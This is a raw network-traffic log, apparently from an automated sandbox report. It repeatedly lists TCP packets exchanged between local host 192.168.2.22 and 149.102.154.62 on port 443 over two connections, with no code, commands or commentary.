Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
